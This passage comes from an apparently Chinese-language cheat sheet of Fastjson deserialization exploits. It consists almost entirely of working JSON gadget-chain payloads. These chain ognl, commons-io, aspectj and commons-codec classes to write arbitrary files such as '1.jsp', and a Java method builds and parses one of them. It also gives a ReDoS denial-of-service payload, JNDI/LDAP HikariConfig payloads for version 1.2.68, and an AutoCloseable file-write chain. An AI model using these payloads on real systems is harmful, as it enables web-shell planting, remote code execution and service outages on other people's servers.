true 1566 | }, 1567 | "httpContentType":"text/xml", 1568 | "lenient":false, 1569 | "defaultEncoding":"UTF-8" 1570 | }, 1571 | "charsetName": "UTF-8", 1572 | "bufferSize": 1024 1573 | }, 1574 | "boms": [{ 1575 | "@type": "org.apache.commons.io.ByteOrderMark", 1576 | "charsetName": "UTF-8", 1577 | "bytes": [ 1578 | 36,82 1579 | ] 1580 | }] 1581 | } 1582 | } 1583 | } 1584 | }, 1585 | "su18": { 1586 | "@type": "ognl.Evaluation", 1587 | "node": { 1588 | "@type": "ognl.ASTMethod", 1589 | "p": { 1590 | "@type": "ognl.OgnlParser", 1591 | "stream": { 1592 | "@type": "org.apache.commons.io.input.BOMInputStream", 1593 | "delegate": { 1594 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1595 | "reader": { 1596 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1597 | "is":{ 1598 | "@type":"org.apache.commons.io.input.TeeInputStream", 1599 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.is.input"}, 1600 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.is.branch"}, 1601 | "closeBranch": true 1602 | }, 1603 | "httpContentType":"text/xml", 1604 | "lenient":false, 1605 | "defaultEncoding":"UTF-8" 1606 | }, 1607 | "charsetName": "UTF-8", 1608 | "bufferSize": 1024 1609 | }, 1610 | "boms": [{ 1611 | "@type": "org.apache.commons.io.ByteOrderMark", 1612 | "charsetName": "UTF-8", 1613 | "bytes": [ 1614 | 36,82 1615 | ] 1616 | }] 1617 | } 1618 | } 1619 | } 1620 | }, 1621 | "su19": { 1622 | "@type": "ognl.Evaluation", 1623 | "node": { 1624 | "@type": "ognl.ASTMethod", 1625 | "p": { 1626 | "@type": "ognl.OgnlParser", 1627 | "stream": { 1628 | "@type": "org.apache.commons.io.input.BOMInputStream", 1629 | "delegate": { 1630 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1631 | "reader": { 1632 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1633 | "is":{ 1634 | "@type":"org.apache.commons.io.input.TeeInputStream", 1635 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.is.input"}, 1636 | "branch":{"$ref": 
"$.su16.node.p.stream.delegate.reader.is.branch"}, 1637 | "closeBranch": true 1638 | }, 1639 | "httpContentType":"text/xml", 1640 | "lenient":false, 1641 | "defaultEncoding":"UTF-8" 1642 | }, 1643 | "charsetName": "UTF-8", 1644 | "bufferSize": 1024 1645 | }, 1646 | "boms": [{ 1647 | "@type": "org.apache.commons.io.ByteOrderMark", 1648 | "charsetName": "UTF-8", 1649 | "bytes": [ 1650 | 36,82 1651 | ] 1652 | }] 1653 | } 1654 | } 1655 | } 1656 | } 1657 | } 1658 | ``` 1659 | 1660 | ### cc 高版本 2.7 2.8 1661 | ```json 1662 | { 1663 | "su14": { 1664 | "@type": "java.lang.Exception", 1665 | "@type": "ognl.OgnlException" 1666 | }, 1667 | "su15": { 1668 | "@type": "java.lang.Class", 1669 | "val": { 1670 | "@type": "com.alibaba.fastjson.JSONObject", 1671 | { 1672 | "@type": "java.lang.String" 1673 | "@type": "ognl.OgnlException", 1674 | "_evaluation": "" 1675 | } 1676 | }, 1677 | "su16": { 1678 | "@type": "ognl.Evaluation", 1679 | "node": { 1680 | "@type": "ognl.ASTMethod", 1681 | "p": { 1682 | "@type": "ognl.OgnlParser", 1683 | "stream": { 1684 | "@type": "org.apache.commons.io.input.BOMInputStream", 1685 | "delegate": { 1686 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1687 | "reader": { 1688 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1689 | "inputStream":{ 1690 | "@type":"org.apache.commons.io.input.TeeInputStream", 1691 | "input":{ 1692 | "@type":"org.apache.commons.io.input.ReaderInputStream", 1693 | "reader":{ 1694 | "@type":"org.apache.commons.io.input.CharSequenceReader", 1695 | "charSequence":{"@type":"java.lang.String""test8200个a", 1696 | "start":0, 1697 | "end":2147483647 1698 | }, 1699 | "charsetName":"UTF-8", 1700 | "bufferSize":1024 1701 | }, 1702 | "branch":{ 1703 | "@type":"org.apache.commons.io.output.WriterOutputStream", 1704 | "writer":{ 1705 | "@type":"org.apache.commons.io.output.FileWriterWithEncoding", 1706 | "file":"1.jsp", 1707 | "charsetName":"UTF-8", 1708 | "append": false 1709 | }, 1710 | "charsetName":"UTF-8", 1711 | 
"bufferSize": 1024, 1712 | "writeImmediately": true 1713 | }, 1714 | "closeBranch": true 1715 | }, 1716 | "httpContentType":"text/xml", 1717 | "lenient":false, 1718 | "defaultEncoding":"UTF-8" 1719 | }, 1720 | "charsetName": "UTF-8", 1721 | "bufferSize": 1024 1722 | }, 1723 | "boms": [{ 1724 | "@type": "org.apache.commons.io.ByteOrderMark", 1725 | "charsetName": "UTF-8", 1726 | "bytes": [ 1727 | 36,82 1728 | ] 1729 | }] 1730 | } 1731 | } 1732 | } 1733 | }, 1734 | "su17": { 1735 | "@type": "ognl.Evaluation", 1736 | "node": { 1737 | "@type": "ognl.ASTMethod", 1738 | "p": { 1739 | "@type": "ognl.OgnlParser", 1740 | "stream": { 1741 | "@type": "org.apache.commons.io.input.BOMInputStream", 1742 | "delegate": { 1743 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1744 | "reader": { 1745 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1746 | "inputStream":{ 1747 | "@type":"org.apache.commons.io.input.TeeInputStream", 1748 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.input"}, 1749 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.branch"}, 1750 | "closeBranch": true 1751 | }, 1752 | "httpContentType":"text/xml", 1753 | "lenient":false, 1754 | "defaultEncoding":"UTF-8" 1755 | }, 1756 | "charsetName": "UTF-8", 1757 | "bufferSize": 1024 1758 | }, 1759 | "boms": [{ 1760 | "@type": "org.apache.commons.io.ByteOrderMark", 1761 | "charsetName": "UTF-8", 1762 | "bytes": [ 1763 | 36,82 1764 | ] 1765 | }] 1766 | } 1767 | } 1768 | } 1769 | }, 1770 | "su18": { 1771 | "@type": "ognl.Evaluation", 1772 | "node": { 1773 | "@type": "ognl.ASTMethod", 1774 | "p": { 1775 | "@type": "ognl.OgnlParser", 1776 | "stream": { 1777 | "@type": "org.apache.commons.io.input.BOMInputStream", 1778 | "delegate": { 1779 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1780 | "reader": { 1781 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1782 | "inputStream":{ 1783 | "@type":"org.apache.commons.io.input.TeeInputStream", 
1784 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.input"}, 1785 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.branch"}, 1786 | "closeBranch": true 1787 | }, 1788 | "httpContentType":"text/xml", 1789 | "lenient":false, 1790 | "defaultEncoding":"UTF-8" 1791 | }, 1792 | "charsetName": "UTF-8", 1793 | "bufferSize": 1024 1794 | }, 1795 | "boms": [{ 1796 | "@type": "org.apache.commons.io.ByteOrderMark", 1797 | "charsetName": "UTF-8", 1798 | "bytes": [ 1799 | 36,82 1800 | ] 1801 | }] 1802 | } 1803 | } 1804 | } 1805 | }, 1806 | "su19": { 1807 | "@type": "ognl.Evaluation", 1808 | "node": { 1809 | "@type": "ognl.ASTMethod", 1810 | "p": { 1811 | "@type": "ognl.OgnlParser", 1812 | "stream": { 1813 | "@type": "org.apache.commons.io.input.BOMInputStream", 1814 | "delegate": { 1815 | "@type": "org.apache.commons.io.input.ReaderInputStream", 1816 | "reader": { 1817 | "@type":"org.apache.commons.io.input.XmlStreamReader", 1818 | "inputStream":{ 1819 | "@type":"org.apache.commons.io.input.TeeInputStream", 1820 | "input":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.input"}, 1821 | "branch":{"$ref": "$.su16.node.p.stream.delegate.reader.inputStream.branch"}, 1822 | "closeBranch": true 1823 | }, 1824 | "httpContentType":"text/xml", 1825 | "lenient":false, 1826 | "defaultEncoding":"UTF-8" 1827 | }, 1828 | "charsetName": "UTF-8", 1829 | "bufferSize": 1024 1830 | }, 1831 | "boms": [{ 1832 | "@type": "org.apache.commons.io.ByteOrderMark", 1833 | "charsetName": "UTF-8", 1834 | "bytes": [ 1835 | 36,82 1836 | ] 1837 | }] 1838 | } 1839 | } 1840 | } 1841 | } 1842 | } 1843 | ``` 1844 | 1845 | ## ognl + io + aspectj + commons-codec 写文件 1846 | 需要写入文件大于 8kb 1847 | ```xml 1848 | 1849 | commons-codec 1850 | commons-codec 1851 | 1.6 1852 | 1853 | 1854 | 1855 | commons-io 1856 | commons-io 1857 | 2.2 1858 | 1859 | 1860 | org.aspectj 1861 | aspectjtools 1862 | 1.9.8 1863 | 1864 | 1865 | ognl 1866 | ognl 1867 | 3.2.21 1868 | 1869 | ``` 1870 | 
1871 | ```java 1872 | public void ognl_io_aspectj_code_write(){ 1873 | String str = "test"; 1874 | for (int i = 0; i < 8201; i++){ 1875 | str += "a"; 1876 | } 1877 | 1878 | byte[] sb = str.getBytes(); 1879 | String baseStr = Base64.getEncoder().encodeToString(sb); 1880 | byte[] bytes = baseStr.getBytes(); 1881 | 1882 | 1883 | String payload = "\r\n" 1884 | + "{\r\n" 1885 | + " \"su14\": {\r\n" 1886 | + " \"@type\": \"java.lang.Exception\",\r\n" 1887 | + " \"@type\": \"ognl.OgnlException\"\r\n" 1888 | + " },\r\n" 1889 | + " \"su15\": {\r\n" 1890 | + " \"@type\": \"java.lang.Class\",\r\n" 1891 | + " \"val\": {\r\n" 1892 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n" 1893 | + " {\r\n" 1894 | + " \"@type\": \"java.lang.String\"\r\n" 1895 | + " \"@type\": \"ognl.OgnlException\",\r\n" 1896 | + " \"_evaluation\": \"\"\r\n" 1897 | + " }\r\n" 1898 | + " },\r\n" 1899 | + " \"su16\": {\r\n" 1900 | + " \"@type\": \"ognl.Evaluation\",\r\n" 1901 | + " \"node\": {\r\n" 1902 | + " \"@type\": \"ognl.ASTMethod\",\r\n" 1903 | + " \"p\": {\r\n" 1904 | + " \"@type\": \"ognl.OgnlParser\",\r\n" 1905 | + " \"stream\": {\r\n" 1906 | + " \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\r\n" 1907 | + " \"delegate\":{\r\n" 1908 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n" 1909 | + " \"input\":{\r\n" 1910 | + " \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\r\n" 1911 | + " \"in\":{\r\n" 1912 | + " \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\r\n" 1913 | + " \"charset\":\"utf-8\",\r\n" 1914 | + " \"bufferSize\": 1024,\r\n" 1915 | + " \"s\":{\"@type\":\"java.lang.String\"\""+baseStr+"\"\r\n" 1916 | + " },\r\n" 1917 | + " \"doEncode\":false,\r\n" 1918 | + " \"lineLength\":1024,\r\n" 1919 | + " \"lineSeparator\":\"5ZWKCg==\",\r\n" 1920 | + " \"decodingPolicy\":0\r\n" 1921 | + " },\r\n" 1922 | + " \"branch\":{\r\n" 1923 | + " \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\r\n" 1924 | + " 
\"targetPath\":\"1.jsp\"\r\n" 1925 | + " },\r\n" 1926 | + " \"closeBranch\":true\r\n" 1927 | + " },\r\n" 1928 | + " \"include\":true,\r\n" 1929 | + " \"boms\":[{\r\n" 1930 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n" 1931 | + " \"charsetName\": \"UTF-8\",\r\n" 1932 | + " \"bytes\":"+Arrays.toString(bytes)+"\r\n" 1933 | + " }],\r\n" 1934 | + "}\r\n" 1935 | + " }\r\n" 1936 | + " }\r\n" 1937 | + " },\r\n" 1938 | + " \"su17\": {\r\n" 1939 | + " \"$ref\": \"$.su16.node.p.stream\"\r\n" 1940 | + " },\r\n" 1941 | + " \"su18\": {\r\n" 1942 | + " \"$ref\": \"$.su17.bOM.bytes\"\r\n" 1943 | + " }\r\n" 1944 | + " }"; 1945 | System.out.println(payload); 1946 | JSON.parseObject(payload); 1947 | } 1948 | ``` 1949 | 1950 | 1951 | 1952 | 1953 | 1954 | # 无@type利用 1955 | 对于 Fastjson 1.2.36-1.2.62 的版本存在dos漏洞 1956 | https://b1ue.cn/archives/314.html 1957 | ```json 1958 | {"regex":{"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"},"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"} 1959 | 1960 | {"regex":{"$ref":"$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"},"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"} 1961 | ``` 1962 | 1963 | 1964 | 1965 | # 待测试 1966 | 1.2.68 1967 | ``` 1968 | 1969 | {"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://0.0.0.0"} 1970 | {"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://0.0.0.0"} 1971 | ``` 1972 | 1973 | 1.2.68的写? 
1974 | ``` 1975 | { 1976 | 'stream': 1977 | { 1978 | '@type':"java.lang.AutoCloseable", 1979 | '@type':'java.io.FileOutputStream', 1980 | 'file':'temp', 1981 | 'append':false 1982 | }, 1983 | 'writer': 1984 | { 1985 | '@type':"java.lang.AutoCloseable", 1986 | '@type':'org.apache.solr.common.util.FastOutputStream', 1987 | 'tempBuffer':'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=', 1988 | 'sink': 1989 | { 1990 | '$ref':'$.stream' 1991 | }, 1992 | 'start':38 1993 | }, 1994 | 'close': 1995 | { 1996 | '@type':"java.lang.AutoCloseable", 1997 | '@type':'org.iq80.snappy.SnappyOutputStream', 1998 | 'out': 1999 | { 2000 | '$ref':'$.writer' 2001 | } 2002 | } 2003 | } 2004 | ``` 2005 | 2006 | --------------------------------------------------------------------------------